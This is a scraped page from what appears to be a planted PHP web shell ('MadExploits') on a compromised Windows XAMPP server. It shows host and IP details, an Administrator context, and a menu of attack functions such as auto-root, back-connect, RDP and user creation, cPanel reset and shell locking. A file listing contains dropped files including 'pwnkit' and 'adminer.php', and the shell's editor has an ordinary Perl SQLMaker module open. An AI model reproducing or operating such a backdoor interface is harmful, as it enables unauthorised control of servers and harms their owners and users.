Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
vendor /
lib /
DBIx /
Class /
SQLMaker /
[ HOME SHELL ]
Name
Size
Permission
Action
Role
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
ACCESS.pm
742
B
-rw-rw-rw-
ClassicExtensions.pm
34.83
KB
-rw-rw-rw-
LimitDialects.pm
4.94
KB
-rw-rw-rw-
MSSQL.pm
237
B
-rw-rw-rw-
MySQL.pm
2.63
KB
-rw-rw-rw-
Oracle.pm
6.17
KB
-rw-rw-rw-
OracleJoins.pm
4.43
KB
-rw-rw-rw-
SQLite.pm
229
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ACCESS.pm
package # Hide from PAUSE DBIx::Class::SQLMaker::ACCESS; use strict; use warnings; use base 'DBIx::Class::SQLMaker'; # inner joins must be prefixed with 'INNER ' sub new { my $class = shift; my $self = $class->next::method(@_); $self->{_default_jointype} = 'INNER'; return $self; } # MSAccess is retarded wrt multiple joins in FROM - it requires a certain # way of parenthesizing each left part before each next right part sub _recurse_from { my @j = shift->_gen_from_blocks(@_); # first 2 steps need no parenthesis my $fin_join = join (' ', splice @j, 0, 2); while (@j) { $fin_join = sprintf '( %s ) %s', $fin_join, (shift @j); } # the entire FROM is *ALSO* expected parenthesized "( $fin_join )"; } 1;
Close